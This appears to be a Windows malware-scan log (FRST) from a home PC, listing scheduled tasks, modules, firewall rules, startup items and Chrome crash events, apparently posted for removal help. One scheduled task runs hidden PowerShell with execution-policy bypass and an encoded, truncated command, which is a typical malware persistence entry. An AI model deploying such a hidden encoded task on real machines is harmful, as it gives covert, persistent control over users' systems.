Task: {3455E5EB-982F-4F37-A08F-2611B97362E4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {3A39070B-05D6-4FE4-B21D-6AC28162EA77} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {3F4414FF-AF57-4A12-BB5E-25465C03328D} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {4333970D-7AC2-4816-B4D0-C6B4A5AA8B0D} - System32\Tasks\{792CD4C5-BD69-431C-ADFE-8FC291ABBC34} => C:\Program Files (x86)\Audible\Bin\Manager.exe [2010-10-18] (Audible Inc.)
Task: {4456371C-D5F3-4556-BD69-3DEA9486D8BC} - System32\Tasks\{19CE7EC7-A1CF-43F2-82BD-2B92DB574877} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2014-12-11] (Skype Technologies S.A.)
Task: {4874B179-27CF-4EF3-B6D5-9B73AC212125} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {4A73AF0D-B415-4A75-A48F-59B950DD814F} - System32\Tasks\{13906491-9562-4215-BED2-2F749B84FCF0} => pcalua.exe -a C:\Users\Lexi\Downloads\ActiveSetupN(1).exe -d "C:\Program Files (x86)\Mozilla Firefox"
Task: {595AB45D-32BD-469C-AACD-876FC9D8B726} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-12] (Google Inc.)
Task: {5E3BB964-5022-4A1C-92A6-1C246AEA028E} - System32\Tasks\{840E3E90-DFDD-4516-8907-ADFF482BB6E4} => pcalua.exe -a C:\Users\Lexi\Downloads\ActiveSetupN.exe -d C:\Users\Lexi\Downloads
Task: {62ECE67D-6CE1-4F21-8A41-AF981AFA9D32} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {65E6396D-2E9E-4959-BF08-DB12AD2957C2} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {7A508896-C3CD-4300-BDAA-04953203925D} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {7AF5ABA6-423A-49B5-BA9D-1352F2D4DAED} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-12] (Google Inc.)
Task: {7CAD3314-D3AC-40CF-8B4F-15F972F88E57} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {846F76DA-20A7-45DD-80B6-63BABA67DE9D} - System32\Tasks\MotoHelper Routing => C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperUpdate.exe [2010-09-07] ()
Task: {85AEFD4C-BB58-4309-AB1A-0D23D826D497} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {8A8E57B1-1E98-4427-9E6A-C1300BA645D8} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {8D5BFBF8-B310-4BAC-AFAE-AB69A8B5B6B2} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {8DB4574F-93DB-4D60-8F3D-E6E9973D5190} - System32\Tasks\{6E6318EC-3D88-4C46-A836-8ED495DD7ED2} => pcalua.exe -a C:\windows\system32\pcwrun.exe -c "C:\Program Files (x86)\Audible\Bin\Manager.exe"
Task: {8E429196-FD32-44C9-A7D4-1F6A6049AEAA} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {8E5B2A0F-FC8A-423A-A8BE-3D7AB86A9511} - System32\Tasks\Norton Identity Safe\Norton Error Processor => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.3.12\SymErr.exe
Task: {901656D9-4A6A-484C-8071-772FE3370625} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {9E9F9295-5A95-4BC1-92F1-538253A7EE57} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {A0E37C5A-0E9E-4E5A-97CF-3A8FF2419BED} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {A49859AB-948A-4879-843B-C6F8C597EE05} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {AB79393A-65CD-45EF-A04C-516943694282} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {B0843801-EABC-4F14-836C-8D73C9CF75AA} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {B1EA027F-6C5F-4A60-922B-E3DF71943F1A} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-10] (Adobe Systems Incorporated)
Task: {B1EEF720-5581-431A-88EE-70AE9214EB06} - System32\Tasks\{579AE86B-2E4A-462C-A43D-A9CBDE59DABB} => pcalua.exe -a "C:\Users\Lexi\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\777U89LV\ActiveSetupN.exe" -d C:\Users\Lexi\Desktop
Task: {B7B1A35D-778B-4029-9785-944EAAEC7B62} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {B7ED6DC7-D029-4C26-B746-C8CEA0220FCD} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {BFB2B30C-9AA7-4CF9-9102-4905A8D13BBF} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {C63794CC-3FA0-4129-A703-499ADA72BAC0} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C7018A72-D3B0-424D-8718-859D11159542} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {CED787AA-FC52-4914-965F-EC58A361E401} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {D2897A28-62CA-4684-A5EB-DAF35E369FEC} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-10] (Microsoft Corporation)
Task: {D39FA133-57CC-4534-B9DB-8BF97AA4BF6D} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {D5830A36-AEE1-4246-B3A5-AD088300900D} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {D9980B66-B0B0-49C7-BAD6-1E56A17F63F4} - System32\Tasks\{F173C27D-4866-4D3F-8CF8-F4AA5838C42A} => pcalua.exe -a C:\Users\Lexi\Downloads\BodyMediaArmbandReset(1).exe -d C:\Users\Lexi\Downloads
Task: {DA52D331-0D67-4E23-8587-EBA2B65F4A46} - System32\Tasks\{7E7D0F47-0A78-0E0A-7A11-047E0C7E1178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9440 more characters).
Task: {DDD64684-16CC-4C8E-8741-D465C0D1EE60} - System32\Tasks\{2CC5D8DF-1473-45CC-BECD-C52847C8BD47} => pcalua.exe -a C:\Users\Lexi\Documents\OPS653v400B\OPS653ver400B\DSETUP.EXE -d C:\Users\Lexi\Documents\OPS653v400B\OPS653ver400B
Task: {E42C5FDB-7D30-4A22-A9C8-AA3457DA6D6D} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {F1BFB372-F5DF-4596-BEC2-F29A89056CE5} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {F840B761-34BF-4385-AE9A-F65F6D27E4B7} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {FE67C988-F7E5-4A52-94EE-E6C66EE41EAE} - System32\Tasks\{789ED4DD-0568-434B-88F2-2FB36DC7A2D7} => pcalua.exe -a C:\Users\Lexi\Documents\OPS653v400B\OPS653ver400B\DSETUP.EXE -d C:\Users\Lexi\Documents\OPS653v400B\OPS653ver400B

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-07-10 06:00 - 2015-07-10 06:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-08-27 23:59 - 2015-08-27 23:59 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-09-12 13:07 - 2015-08-11 04:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2013-07-29 02:45 - 2013-07-29 02:45 - 00193024 _____ () C:\Program Files (x86)\Fast Free Converter\FastFreeConverterUpdt.exe
2011-04-11 09:37 - 2005-04-22 12:36 - 00143360 _____ () C:\WINDOWS\system32\BrSNMP64.dll
2015-09-30 22:08 - 2015-09-17 01:48 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-09-30 22:08 - 2015-09-17 01:48 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2012-11-26 22:54 - 2012-11-26 22:54 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2010-03-03 16:15 - 2010-03-03 16:15 - 08762680 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2009-11-03 15:26 - 2009-11-03 15:26 - 00053560 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll
2010-03-03 16:15 - 2010-03-03 16:15 - 00019256 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF10.dll
2010-03-03 16:15 - 2010-03-03 16:15 - 00019256 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF11.dll
2010-05-28 20:34 - 2009-06-22 17:40 - 00022328 _____ () C:\Program Files\TOSHIBA\Toshiba Assist\NotifyX.dll
2009-03-12 21:08 - 2009-03-12 21:08 - 00048640 _____ () C:\Program Files (x86)\Toshiba\PCDiag\NotifyPCD.dll
2009-07-25 19:38 - 2009-07-25 19:38 - 00017800 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
2009-01-30 20:11 - 2009-01-30 20:11 - 01091072 _____ () C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVCtrl.dll
2009-01-30 20:10 - 2009-01-30 20:10 - 01043456 _____ () C:\Program Files\TOSHIBA\SmartFaceV\FaceRec.dll
2009-01-30 20:11 - 2009-01-30 20:11 - 07861248 _____ () C:\Program Files\TOSHIBA\SmartFaceV\FaceHI.dll
2010-03-12 17:41 - 2010-03-12 17:41 - 00417080 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\TcrdKBB.exe
2010-02-05 19:44 - 2010-02-05 19:44 - 00079192 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll
2015-12-08 21:33 - 2015-11-24 23:18 - 00928768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RulesBackgroundTasks.dll
2015-09-30 22:08 - 2015-09-17 00:43 - 02028544 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RulesService.dll
2015-12-08 21:32 - 2015-11-24 23:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-08 21:32 - 2015-11-24 23:17 - 00619008 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SignalsManager.dll
2015-12-08 21:33 - 2015-11-24 23:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-09-30 22:08 - 2015-09-17 00:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-07-10 05:59 - 2015-07-10 05:59 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
2015-12-08 21:33 - 2015-11-24 23:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-08 21:33 - 2015-11-24 23:24 - 00884736 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2015-09-30 22:08 - 2015-09-17 00:43 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-10 06:00 - 2015-07-10 08:14 - 00210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2011-07-19 14:26 - 2008-11-12 14:32 - 00014848 _____ () C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardPath.dll
2015-12-01 15:37 - 2015-12-01 15:37 - 00439504 _____ () C:\Program Files (x86)\Evernote\Evernote\libxml2.dll
2015-12-01 15:37 - 2015-12-01 15:37 - 00321232 _____ () C:\Program Files (x86)\Evernote\Evernote\libtidy.dll
2014-02-01 13:30 - 2014-02-01 13:30 - 00861184 _____ () C:\Program Files (x86)\LeapFrog\LeapFrog Connect\platforms\qwindows.dll
2013-07-27 21:59 - 2016-03-08 22:18 - 00046080 _____ () C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\NativeOperations.dll
2015-08-27 20:47 - 2015-08-27 20:47 - 00541696 _____ () C:\Users\Lexi\AppData\Local\Temp\sqlite-3.7.2-sqlitejdbc.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:443E07A5 [118]
AlternateDataStreams: C:\Users\Lexi\Documents\be you.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\be you.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\be you.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\beyoubravely.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\beyoubravely.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\beyoubravely.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.png:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\feather.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\feather.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\feather.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler woordle.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler woordle.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler woordle.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Control Panel\Desktop\\Wallpaper -> c:\users\lexi\appdata\roaming\mozilla\firefox\desktop background.bmp
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\StartupFolder: => "Amazon Unbox.lnk"
HKLM\...\StartupApproved\StartupFolder: => "BodyMedia Sync.lnk"
HKLM\...\StartupApproved\StartupFolder: => "Audible Download Manager.lnk"
HKLM\...\StartupApproved\StartupFolder: => "ScanSnap Manager.lnk"
HKLM\...\StartupApproved\Run32: => "BrMfcWnd"
HKLM\...\StartupApproved\Run32: => "ControlCenter3"
HKLM\...\StartupApproved\Run32: => "Secure Online Account Numbers"
HKLM\...\StartupApproved\Run32: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "ScanSnap WIA Service Checker"
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\StartupApproved\Run: => "FileThis Fetch"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [uDP Query User{E520D0E0-0828-42E1-9B8F-D3A6F8885E82}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [TCP Query User{1419A417-13D5-4702-BFD4-F63FBF5FFB87}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{A60CE462-6280-43D7-8043-4506596E8C0A}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{99C87474-2E7B-4132-BA2B-B13267F3602E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{766F3D6F-3D90-4128-ADE7-3B980ABF4B0F}] => (Allow) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\LeapfrogConnect.exe
FirewallRules: [{7E7E8C92-1D6F-4F1B-84ED-326711765E73}] => (Allow) LPort=1900
FirewallRules: [{8839DD16-229F-4D59-AE9D-D31901B1A1E7}] => (Allow) LPort=2869
FirewallRules: [{CA4B34F1-7F78-44CA-9F85-C710F94C15D4}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [uDP Query User{89C13623-A2E8-4554-9ED3-A35ADD22F801}C:\users\lexi\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\lexi\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [TCP Query User{893572F9-21AA-4841-9065-1F2B956B3D19}C:\users\lexi\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\lexi\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{7B09EC93-7311-42C7-9076-F9DCBCC8882F}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{94AADD84-2E1F-4D28-ABA0-77B8E66501A9}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{B776F243-5D48-4D87-98C3-4AC5992C2636}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{29BCFEEB-BF5C-4E1F-9690-49538EFC5E9D}] => (Allow) LPort=54925
FirewallRules: [{921DE0EB-FDAD-4FDF-90D6-7E13B8596699}] => (Allow) C:\Program Files (x86)\Brother\Brmfl07a\FAXRX.exe
FirewallRules: [{17903D5B-36C6-4F8D-9832-003C6D005923}] => (Allow) C:\Program Files (x86)\Brother\Brmfl07a\FAXRX.exe
FirewallRules: [{E8406401-B39A-4877-B451-6D79C04CA923}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{D753ECEB-34A2-4DC5-AD5C-B1A0E93512DB}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{044CAA22-7EB2-4B00-B629-31456C777E14}] => (Allow) svchost.exe
FirewallRules: [{F2FB915F-C948-46CF-B034-7FECCFF8B944}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{2B2D95DA-291D-427A-B6ED-25EB399F552F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{119ED0AD-8AF0-4676-80D5-5166F5F371B3}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C293909D-A688-4D73-AE69-CA0271E6FD70}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

26-02-2016 16:51:34 Scheduled Checkpoint
03-03-2016 23:14:19 Removed Storia.
07-03-2016 12:51:40 Restore Operation

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/08/2016 10:59:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 48.0.2564.116, time stamp: 0x56c52f1d
Faulting module name: chrome.dll, version: 48.0.2564.116, time stamp: 0x56c52969
Exception code: 0x80000003
Fault offset: 0x00016939
Faulting process id: 0x241c
Faulting application start time: 0xchrome.exe0
Faulting application path: chrome.exe1
Faulting module path: chrome.exe2
Report Id: chrome.exe3
Faulting package full name: chrome.exe4
Faulting package-relative application ID: chrome.exe5

Error: (03/08/2016 10:58:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 48.0.2564.116, time stamp: 0x56c52f1d
Faulting module name: chrome.dll, version: 48.0.2564.116, time stamp: 0x56c52969
Exception code: 0x80000003
Fault offset: 0x00016939
Faulting process id: 0x2668
Faulting application start time: 0xchrome.exe0
Faulting application path: chrome.exe1
Faulting module path: chrome.exe2
Report Id: chrome.exe3
Faulting package full name: chrome.exe4
Faulting package-relative application ID: chrome.exe5

Error: (03/08/2016 10:51:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 48.0.2564.116, time stamp: 0x56c52f1d
Faulting module name: chrome.dll, version: 48.0.2564.116, time stamp: 0x56c52969
Exception code: 0x80000003
Fault offset: 0x00016939
Faulting process id: 0x2b90
Faulting application start time: 0xchrome.exe0
Faulting application path: chrome.exe1
Faulting module path: chrome.exe2
Report Id: chrome.exe3
Faulting package full name: chrome.exe4
Faulting package-relative application ID: chrome.exe5

Error: (03/08/2016 10:50:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 48.0.2564.116, time stamp: 0x56c52f1d
Faulting module name: chrome.dll, version: 48.0.2564.116, time stamp: 0x56c52969
Exception code: 0x80000003
Fault offset: 0x00016939
Faulting process id: 0x2ad8
Faulting application start time: 0xchrome.exe0
Faulting application path: chrome.exe1
Faulting module path: chrome.exe2
Report Id: chrome.exe3
Faulting package full name: chrome.exe4
Faulting package-relative application ID: chrome.exe5

Error: (03/08/2016 10:45:09 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 48.0.2564.116, time stamp: 0x56c52f1d
Faulting module name: chrome.dll, version: 48.0.2564.116, time stamp: 0x56c52969
Exception code: 0x80000003
Fault offset: 0x00016939
Faulting process id: 0x1d5c
Faulting application start time: 0xchrome.exe0
Faulting application path: chrome.exe1
Faulting module path: chrome.exe2
Report Id: chrome.exe3
Faulting package full name: chrome.exe4
Faulting package-relative application ID: chrome.exe5

Error: (03/08/2016 10:45:02 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 48.0.2564.116, time stamp: 0x56c52f1d
Faulting module name: chrome.dll, version: 48.0.2564.116, time stamp: 0x56c52969
Exception code: 0x80000003
Fault offset: 0x00016939
Faulting process id: 0x2f34
Faulting application start time: 0xchrome.exe0
Faulting application path: chrome.exe1
Faulting module path: chrome.exe2
Report Id: chrome.exe3
Faulting package full name: chrome.exe4
Faulting package-relative application ID: chrome.exe5

Error: (03/08/2016 10:44:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 48.0.2564.116, time stamp: 0x56c52f1d
Faulting module name: chrome.dll, version: 48.0.2564.116, time stamp: 0x56c52969
Exception code: 0x80000003
Fault offset: 0x00016939
Faulting process id: 0x2a18
Faulting application start time: 0xchrome.exe0
Faulting application path: chrome.exe1
Faulting module path: chrome.exe2
Report Id: chrome.exe3
Faulting package full name: chrome.exe4
Faulting package-relative application ID: chrome.exe5

Error: (03/08/2016 10:44:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 48.0.2564.116, time stamp: 0x56c52f1d
Faulting module name: chrome.dll, version: 48.0.2564.116, time stamp: 0x56c52969
Exception code: 0x80000003
Fault offset: 0x00016939
Faulting process id: 0x14cc
Faulting application start time: 0xchrome.exe0
Faulting application path: chrome.exe1
Faulting module path: chrome.exe2
Report Id: chrome.exe3
Faulting package full name: chrome.exe4
Faulting package-relative application ID: chrome.exe5

Error: (03/08/2016 10:44:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 48.0.2564.116, time stamp: 0x56c52f1d
Faulting module name: chrome.dll, version: 48.0.2564.116, time stamp: 0x56c52969
Exception code: 0x80000003
Fault offset: 0x00016939
Faulting process id: 0x638
Faulting application start time: 0xchrome.exe0
Faulting application path: chrome.exe1
Faulting module path: chrome.exe2
Report Id: chrome.exe3
Faulting package full name: chrome.exe4
Faulting package-relative application ID: chrome.exe5

Error: (03/08/2016 10:39:56 PM) (Source: SideBySide) (EventID: 78) (User: )
